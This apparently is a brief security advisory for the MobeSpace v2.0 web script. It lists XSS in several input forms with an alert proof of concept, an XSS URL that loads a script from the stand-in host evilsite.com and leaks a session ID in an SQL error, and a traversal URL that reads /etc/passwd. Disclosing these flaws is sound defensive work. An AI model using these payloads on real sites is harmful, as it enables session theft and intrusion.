MobeSpace v2.0

Homepage:

http://mobescripts.com/


Effected files:

index.php


The input forms of:


- Profile

- Comments

- Uploading a file to your locker

- Posting in your blog

- Creating a caption for your pic

- Sending PM's


The input boxes of the above do not sanatize user input before generating it. 
for PoC just trying putting: 


<IMG SRC=javascript:alert('XSS')>


--------------------------------


XSS Vulnerability with SQL query error msg:


http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase


You have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'This is remote text via 
xss.js located at evilsite.comPHPSESSID=004baf662f7d63889816e037a6bb2e56 WHERE 
name LIK 


-------------------------------


Possible directory traversal via rss feed:


http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/

Reply via email to